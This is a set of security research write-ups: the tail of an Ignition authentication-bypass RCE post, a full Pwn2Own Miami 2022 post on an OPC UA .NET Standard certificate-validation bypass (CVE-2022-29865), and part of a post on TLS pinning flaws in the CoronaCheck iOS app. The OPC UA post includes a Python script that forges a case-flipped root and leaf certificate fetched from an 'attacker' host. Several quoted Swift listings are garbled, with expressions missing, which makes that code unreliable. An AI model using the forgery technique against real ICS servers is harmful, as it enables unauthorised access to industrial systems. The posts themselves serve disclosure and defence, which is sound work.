Exploiting these vulnerabilities would grant us code execution on the machine hosting Ignition. This means that we could immediately manipulate or disrupt any process handled by or via this server. For example, we might be able to take over the communication with PLCs. In addition, the SYSTEM privileges would make it a fantastic starting point for further attacks on other parts of the ICS or IT network.

In most cases, the Ignition server will not be exposed publicly to the internet, but only available on the internal ICS network. Therefore, this vulnerability would need to be combined with different vulnerabilities or attacks that grant us access to that network.

The fix

This vulnerability was addressed by Inductive Automation in versions 8.1.17 and 7.9.20 and assigned CVE-2022-35871. AD User Sources now disable the “SSO Enabled” setting automatically, unless a specific flag is set on the server (-Dignition.enableInsecureAdSso=true). In other words, Inductive Automation has chosen to deprecate this feature and documented that it is dangerous to use. This may seem like a disappointing fix, but implementing a secure SSO protocol would likely have taken a lot more time. This way the vulnerability can be avoided and, if desired, Inductive Automation could implement a secure SSO protocol without time pressure.


When implementing security critical features (such as authentication), it is important to make a good design first. When authentication is combined with single sign-on and native applications this is even more important, as it can become very complex. With such a design, it becomes possible to catch mistakes before the features are implemented and to test each part separately.

While we of course don’t know how this feature was built, we suspect no such design was created. Having a cryptographic protocol like Kerberos completely missing from the implementation should be quite obvious if the feature had been fully designed first.

Features allowing users to execute their own code on a server can be required in certain use-cases. However, the fact that this was available for a user who did not have any permissions or roles explicitly assigned to them is worrisome. This means that any authentication bypass immediately becomes an RCE vulnerability.


We’ve demonstrated a remote code execution vulnerability against Inductive Automation Ignition. We found that authentication can be bypassed on a server with AD single sign-on enabled. The (cryptographic) protocol for handling single sign-on appears to not be implemented at all.

After bypassing the authentication, we used functionality of the server to execute arbitrary Python code with SYSTEM privileges to set up a reverse shell.

Big shout-out to Inductive Automation for their handling of this year's edition of Pwn2Own! They published all details of all findings on their website, including an extensive write-up of their thoughts and fixes. Well done!

We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami, and we hope to return at a later edition!

You can find the other four write-ups here:

  • Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
  • Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution
  • Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS
  • Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution

Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass

19 July 2022 at 00:00

This write-up is part 1 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for the Trusted Application Check Bypass in the OPC Foundation’s OPC UA .NET Standard (CVE-2022-29865).

Wow - confirmed! With one of the more interesting bugs we've seen at #Pwn2Own, @daankeuper and @xnyhps from @sector7_nl bypassed the trusted application check on the OPC Foundation OPC UA .NET Standard. They earn $40,000 and 40 Master of Pwn points. #P2OMiami

— Zero Day Initiative (@thezdi) April 20, 2022

OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.

The security for OPC UA connections can be configured in three different ways: without any security, with signing only, or with signing and encryption. In the latter two cases, both endpoints authenticate to each other using X.509 certificates. While these are the same type of certificates as used in TLS, the encryption protocol itself is custom and not based on TLS.

At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different “payload” options:

  • Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
  • Remote code execution. Being able to take over the server.
  • Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.

Of course, with a pre-authentication RCE it would be possible to modify the configuration of the server to change the security level and bypass the trusted application check that way, but this was not allowed.

OPC UA .NET Standard

We looked at potential trusted application check bypasses in all four servers in scope, but only found one, in OPC UA .NET Standard. This server is used as a reference implementation for OPC UA in C# and is open source, meaning that this bypass could affect many ICS products that incorporate it as a library.

The core of the issue is in the function InternalValidate in CertificateValidator.cs. The logic for verifying a certificate here is quite complicated, which likely contributed to a bug like this being missed.

What we heard from the OPC Foundation is that the reason this check is so complicated is that they do not want to use the built-in certificate store of Windows. Instead, the certificates of the application can be managed by placing the certificate files in a specific directory on the server. The OPC UA specification has such a high level of detail that it even suggests how to store those certificates.

The core issue here is that two different certificate chains are built without verifying that they are equal. By crafting a chain in a very specific way, it is possible to make the server accept it, even though it is not signed by a trusted root.

862 protected virtual async Task InternalValidate(X509Certificate2Collection certificates, ConfiguredEndpoint endpoint)
863 {
864    X509Certificate2 certificate = certificates[0];
866    // check for previously validated certificate.
867    X509Certificate2 certificate2 = null;
869    if (m_validatedCertificates.TryGetValue(certificate.Thumbprint, out certificate2))
870    {
871        if (Utils.IsEqual(certificate2.RawData, certificate.RawData))
872        {
873            return;
874        }
875    }
877    CertificateIdentifier trustedCertificate = await GetTrustedCertificate(certificate).ConfigureAwait(false);
879    // get the issuers (checks the revocation lists if using directory stores).
880    List<CertificateIdentifier> issuers = new List<CertificateIdentifier>();
881    Dictionary<X509Certificate2, ServiceResultException> validationErrors = new Dictionary<X509Certificate2, ServiceResultException>();
883    bool isIssuerTrusted = await GetIssuersNoExceptionsOnGetIssuer(certificates, issuers, validationErrors).ConfigureAwait(false);
885    ServiceResult sresult = PopulateSresultWithValidationErrors(validationErrors);
887    // setup policy chain
888    X509ChainPolicy policy = new X509ChainPolicy();
889    policy.RevocationFlag = X509RevocationFlag.EntireChain;
890    policy.RevocationMode = X509RevocationMode.NoCheck;
891    policy.VerificationFlags = X509VerificationFlags.NoFlag;
893    foreach (CertificateIdentifier issuer in issuers)
894    {
895        if ((issuer.ValidationOptions & CertificateValidationOptions.SuppressRevocationStatusUnknown) != 0)
896        {
897            policy.VerificationFlags |= X509VerificationFlags.IgnoreCertificateAuthorityRevocationUnknown;
898            policy.VerificationFlags |= X509VerificationFlags.IgnoreCtlSignerRevocationUnknown;
899            policy.VerificationFlags |= X509VerificationFlags.IgnoreEndRevocationUnknown;
900            policy.VerificationFlags |= X509VerificationFlags.IgnoreRootRevocationUnknown;
901        }
903        // we did the revocation check in the GetIssuers call. No need here.
904        policy.RevocationMode = X509RevocationMode.NoCheck;
905        policy.ExtraStore.Add(issuer.Certificate);
906    }
908    // build chain.
909    using (X509Chain chain = new X509Chain())
910    {
911        chain.ChainPolicy = policy;
912        chain.Build(certificate);
914        // check the chain results.
915        CertificateIdentifier target = trustedCertificate;
917        if (target == null)
918        {
919            target = new CertificateIdentifier(certificate);
920        }
922        for (int ii = 0; ii < chain.ChainElements.Count; ii++)
923        {
924            X509ChainElement element = chain.ChainElements[ii];
926            CertificateIdentifier issuer = null;
928            if (ii < issuers.Count)
929            {
930                issuer = issuers[ii];
931            }
933            // check for chain status errors.
934            if (element.ChainElementStatus.Length > 0)
935            {
936                foreach (X509ChainStatus status in element.ChainElementStatus)
937                {
938                    ServiceResult result = CheckChainStatus(status, target, issuer, (ii != 0));
939                    if (ServiceResult.IsBad(result))
940                    {
941                        sresult = new ServiceResult(result, sresult);
942                    }
943                }
944            }
946            if (issuer != null)
947            {
948                target = issuer;
949            }
950        }
951    }

First, on line 883, GetIssuersNoExceptionsOnGetIssuer is used to construct a certificate chain for the certificate to be validated (returned in the out variable issuers). This function works in a loop. In each iteration, it attempts to find the issuer of the current certificate. For this it consults the following locations:

  1. The list of trusted certificates stored on the server. If it is found in this list, the function will return true.
  2. The list of issuer certificates stored on the server. These certificates are not explicitly trusted, but can be used to construct a chain to a trusted root.
  3. The list of additional certificates sent by the client. Just like in TLS, it is possible to include additional certificates in the OPC UA handshake.

If an issuer is found, it becomes the current certificate and the loop continues until the current certificate is self-signed or no issuer can be found.

To find the issuer of a certificate, the function Match is used. This function compares the issuer name of the certificate with the subject name of each potential issuer. Additionally, the serial number or the subject key identifier must match. Note that the cryptographic signature is not yet considered at this stage, the match is therefore only based on forgeable certificate metadata.

The comparison of the names in Match is implemented in CompareDistinguishedName, but this implementation is unusual. This function decomposes the name into components, sorts them, and then does a case-insensitive match on each component. This is not how most implementations compare X.509 names.
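
To make the difference concrete, here is a Python sketch of such a comparison (our simplified illustration, treating a distinguished name as comma-separated components; not the actual C# code):

# Components are sorted and compared case-insensitively, so two names that
# differ only in case (or in component order) are considered equal.
def compare_distinguished_name(a, b):
    parts_a = sorted(part.strip().lower() for part in a.split(","))
    parts_b = sorted(part.strip().lower() for part in b.split(","))
    return parts_a == parts_b

print(compare_distinguished_name("CN=Root", "CN=rOOT"))  # True
print("CN=Root" == "CN=rOOT")  # False: a literal comparison rejects it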

Next up, on line 912 an X509Chain object is used. The intent here appears to be to verify that the chain built using GetIssuersNoExceptionsOnGetIssuer is cryptographically valid. However, because it is not configured with the root certificates used by the application, it will often result in errors. Thus, on line 938, the function CheckChainStatus is used to ignore certain types of errors. For example, an UntrustedRoot error is ignored if it occurred for the certificate at the root.

The vulnerability that we found is that there is no verification that the certificate chain built by GetIssuersNoExceptionsOnGetIssuer and the one built by X509Chain.Build are equal. By abusing the unusual name comparison it is possible to construct a certificate such that both functions will result in a different chain. By making sure that the errors in the second chain only occur where CheckChainStatus ignores them, it is possible for this certificate to get accepted by the server.

The only prerequisite for this attack is that we know the subject name of one of the trusted root certificates and either its serial number or subject key identifier. Because certificates are not secret, these values should be easy to obtain in practice. During the demonstration, we ran the attack against a server which itself has a certificate issued by a trusted root certificate; that certificate gives us all the metadata we need, a situation that should be common in practice.



Suppose the server is configured to trust a certificate with the following details:

        Version: 3 (0x2)
        Serial Number: 9891791597891487306 (0x8946b40ca084064a)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN=Root
            Not Before: Feb 24 09:35:53 2022 GMT
            Not After : Feb 24 09:35:53 2023 GMT
        Subject: CN=Root
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:

            X509v3 Basic Constraints:
            X509v3 Key Usage:
                Certificate Sign, CRL Sign
    Signature Algorithm: sha1WithRSAEncryption

And suppose that the OPC server itself is configured with the following certificate, issued from this root:

        Version: 3 (0x2)
        Serial Number:
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN=Root
            Not Before: Feb 24 09:35:53 2022 GMT
            Not After : Mar 26 09:35:53 2022 GMT
        Subject: CN=Quickstart Reference Server, C=US, ST=Arizona, O=OPC Foundation, DC=opcserver
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:

            X509v3 Basic Constraints:
            X509v3 Key Usage:
                Digital Signature, Key Encipherment, Data Encipherment, Key Agreement
            X509v3 Subject Alternative Name:
                DNS:opcserver, URI:urn:opcserver
    Signature Algorithm: sha1WithRSAEncryption

Then the attacker can connect to the server to obtain this certificate and use the data in the Issuer and X509v3 Authority Key Identifier fields to craft two new certificates.

First of all, the attacker generates a new root certificate which uses the same common name as the trusted root certificate, but where each letter is flipped in case (i.e.: upper case to lower case and lower case to upper case). This certificate is self-signed and must contain the CA=TRUE basic constraint. The attacker makes this certificate available for download as a PEM file over HTTP on a webserver at the URL http://attacker/root.pem.

        Version: 3 (0x2)
        Serial Number:
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=rOOT
            Not Before: Feb 17 10:40:24 2022 GMT
            Not After : May 25 10:40:24 2022 GMT
        Subject: CN=rOOT
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (3072 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints:
            X509v3 Key Usage:
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
    Signature Algorithm: sha256WithRSAEncryption

Secondly, the attacker generates a new leaf certificate, signed using the previously created root. The following fields are added to this certificate:

  • The issuer contains the subject name of the fake root.
  • The X509v3 Authority Key Identifier extension contains a directory name of the fake root and a serial number of the real trusted root.
  • The certificate contains an Authority Information Access extension containing a CA Issuers field containing the URL where the fake root certificate PEM file can be downloaded.

All other fields, like the Subject and Subject Alternative Name fields, can contain any data the attacker may choose. To pass all further checks in InternalValidate, the validity time should contain the current time and the keyUsage field should contain Data Encipherment. A Subject Alternative Name extension could be added if the domain is checked.

        Version: 3 (0x2)
        Serial Number:
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=rOOT
            Not Before: Feb 17 10:40:24 2022 GMT
            Not After : May 25 10:40:24 2022 GMT
        Subject: CN=FakeCert
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (3072 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:

            X509v3 Basic Constraints:
            Authority Information Access:
                CA Issuers - URI:http://attacker/root.pem

            X509v3 Key Usage:
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
    Signature Algorithm: sha256WithRSAEncryption
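
As an illustration, the two certificates above could be generated along these lines. This is a sketch using Python's cryptography package, not the exploit code we used; the names, serial number and URL are the example values from this post:

import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import AuthorityInformationAccessOID, NameOID

root_key = rsa.generate_private_key(public_exponent=65537, key_size=3072)
leaf_key = rsa.generate_private_key(public_exponent=65537, key_size=3072)

# Case-flipped copy of the trusted root's subject: CN=Root becomes CN=rOOT.
fake_root_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "rOOT")])
now = datetime.datetime.utcnow()

fake_root = (
    x509.CertificateBuilder()
    .subject_name(fake_root_name)
    .issuer_name(fake_root_name)  # self-signed
    .public_key(root_key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now)
    .not_valid_after(now + datetime.timedelta(days=90))
    .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
    .sign(root_key, hashes.SHA256())
)

# Host this file at http://attacker/root.pem so chain.Build() can fetch it.
with open("root.pem", "wb") as f:
    f.write(fake_root.public_bytes(serialization.Encoding.PEM))

leaf = (
    x509.CertificateBuilder()
    .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "FakeCert")]))
    .issuer_name(fake_root_name)
    .public_key(leaf_key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now)
    .not_valid_after(now + datetime.timedelta(days=90))
    # AKI: directory name of the fake root, serial number of the *real* root.
    .add_extension(
        x509.AuthorityKeyIdentifier(
            key_identifier=None,
            authority_cert_issuer=[x509.DirectoryName(fake_root_name)],
            authority_cert_serial_number=0x8946B40CA084064A,
        ),
        critical=False,
    )
    # AIA: tells X509Chain.Build() where to download the fake root.
    .add_extension(
        x509.AuthorityInformationAccess([
            x509.AccessDescription(
                AuthorityInformationAccessOID.CA_ISSUERS,
                x509.UniformResourceIdentifier("http://attacker/root.pem"),
            )
        ]),
        critical=False,
    )
    # keyUsage including Data Encipherment, to pass the later checks.
    .add_extension(
        x509.KeyUsage(
            digital_signature=True, content_commitment=False,
            key_encipherment=True, data_encipherment=True, key_agreement=True,
            key_cert_sign=False, crl_sign=False,
            encipher_only=False, decipher_only=False,
        ),
        critical=False,
    )
    .sign(root_key, hashes.SHA256())
)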


When the attacker connects with this CN=FakeCert certificate, the following will happen:

GetIssuersNoExceptionsOnGetIssuer will look in its trusted certificate store for the issuer of this certificate. To do this, it compares the Issuer name of the received certificate with the Subject name of the certificates in the store.

It does this check by decomposing the distinguished name, sorting the components, and then doing a case-insensitive match on each component.

So, it compares the common name of the issuer from the certificate:

        Issuer: CN=rOOT

with the common name of the subject of the trusted certificate:

        Subject: CN=Root

In addition, it will compare the serial number of the root certificate with the serial number of the authority key identifier extension, which are equal:

Serial Number: 9891791597891487306 (0x8946b40ca084064a)
X509v3 Authority Key Identifier:
    DirName:/CN=rOOT
    serial:89:46:B4:0C:A0:84:06:4A

This function will therefore consider the CN=Root certificate a match. Checking the signature would show that it did not actually sign FakeCert, but signatures are not verified at this stage. The result is a chain with one issuer, and isIssuerTrusted will be true.

Then, it creates an X509Chain object and calls chain.Build(certificate). The result code of this call is ignored, as is the overall status of the chain; only the statuses of the individual chain elements are checked.

As chain.Build does a literal comparison on the subject of the trusted root with the issuer of FakeCert, it will not consider the CN=Root certificate to be the issuer of FakeCert (because it looks for CN=rOOT). While the serial number from the Authority Key Identifier extension matches, this is not sufficient for a match.

Because it can’t find the issuer certificate in its trust store, it will use the CA Issuers URL from the Authority Information Access extension to download the certificate from the webserver. With that, the result of the chain.Build() call will be a chain of two certificates, where the second one indicates the error UntrustedRoot. The function CheckChainStatus ignores this error code because it incorrectly assumes that the corresponding certificate was one of its trusted certificates, but it will in fact be the CN=rOOT certificate.

The remainder of the checks in InternalValidate will now succeed, because issuedByCA is true and isIssuerTrusted is true. The key usage, endpoint domain, use of SHA1 and minimum key size checks can be passed because the attacker has full control over the contents of FakeCert.

Our exploit can be seen in action in the video below:


With this vulnerability we could bypass the Trusted Application Check against the reference server that is included in the OPC UA .NET Standard repository. It would also be possible to bypass the check at the client side to impersonate a server.

In addition, OPC UA also has what is known as “User Authentication”, which happens after the Trusted Application Check to establish a session. One of the options for User Authentication is by using an X.509 certificate, which could be bypassed in the same way too.

In practice, an OPC UA server would usually not be exposed to the public internet, so to exploit this issue an attacker would already need access to an internal ICS network. However, in the rare cases where exposing an OPC UA server to the public internet is unavoidable, enabling certificate authentication would be the most effective method for securing it. This vulnerability bypasses exactly that check, making it possible to gain access to the communication.

Once connected to an OPC UA server, the attacker would be able to read and write data, which could be used to disrupt the ICS processes that use this server.

The fix

The issues we found were fixed in commit 51549f5ed846c8ac060add509c76ff4c0470f24d and assigned CVE-2022-29865. Names are now compared in the same manner as in other X.509 implementations: the comparison is no longer case-insensitive and name components are no longer re-sorted. In addition, defensive checks were added to make sure that the two certificate chains that are used are equal.


Certificate validation is tricky, as we have also demonstrated before in our post about the Dutch Corona-check app. These vulnerabilities actually bear some similarity, as both used a check for issuers based only on forgeable data. In this case, the cause is the desire to not use the Windows certificate store. We are unsure if this is truly the only way to implement this in .NET, as the CustomTrustStore property and TrustMode=CustomRootTrust setting on an X509ChainPolicy object appear to offer the required functionality without a dependence on the Windows certificate store.

The level of detail in the OPC UA specification regarding certificate validation is admirable. For example, it specifies clearly what errors should be used in what situations and there is even a chapter that suggests how to store the certificates on the server. However, there is a risk that over-specification of how a process like this should work leads to complex and non-idiomatic code. If the normal .NET API can no longer be applied directly as certain parts need to be re-implemented, this could create a large potential source for vulnerabilities.


We demonstrated a Trusted Application Check Bypass in OPC Foundation OPC UA .NET Standard. This can be used to set up a trusted connection to an OPC UA server. The cause of this vulnerability was the modification of the certificate validation procedure to use trusted roots stored in a custom location instead of the Windows certificate store, combined with an unusual name comparison. This made it possible to make our certificate appear to be signed by one of the trusted roots.

We thank the Zero Day Initiative for organizing this year's edition of Pwn2Own Miami; we hope to return for a future edition!

You can find the other four write-ups here:

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.


The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier, can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is referred to in the codebase as the Holder app, to distinguish it from the Verifier app. The source code of these apps is available on GitHub, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The Holder app:

The Verifier app:

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn’t know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person’s QR code is difficult.

Strict requirements were formulated for the security of these connections in the design (described here, in Dutch). This includes the use of certificate pinning to check that the certificates are issued by a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed, for which the PKCS#7 Cryptographic Message Syntax (CMS) format is used.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203 func checkSSL() {
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
213    let policies = [SecPolicyCreateSSL(true, as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
221    for index in 0 ..< certificateCount {
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
226            if let name = serverCert.commonName {
227                if name.lowercased() == {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(, !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
246                if, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }

If an app wants to implement additional verification checks, then it is common to start by performing the platform's own certificate validation. This also means that the certificate chain is resolved: the certificates received from the server may be incomplete or contain additional certificates, and by applying the platform verification a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but with the private root added as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks were not additions to the verification, but replaced it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code of that validation was never checked, so an untrusted certificate was not rejected here.

The app performs three additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.

This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte; certificates are not very large, so this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those, which could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was instead based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the certificate’s issuer’s key, but it can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.
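
For contrast, a comparison along the lines recommended above takes only a few lines. This Python sketch is our illustration; cert_der stands for the DER-encoded certificate bytes:

import hashlib

# Compare the full certificate bytes: forging this requires breaking the CA key
# or the hash function, not just copying two metadata fields.
def is_pinned(cert_der, trusted_ders):
    return any(cert_der == trusted for trusted in trusted_ders)

# Equivalent, using SHA-256 fingerprints, which makes repeated checks cheap.
def is_pinned_by_hash(cert_der, trusted_hashes):
    return hashlib.sha256(cert_der).hexdigest() in trusted_hashes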

OpenSSL.m lines 144 to 227:

144 - (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
151 - (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
187	return isMatch;
190 - (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
226	return isMatch;

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was still rejected by ATS, so we could not completely bypass the certificate validation. It could however still be exploitable in these scenarios:

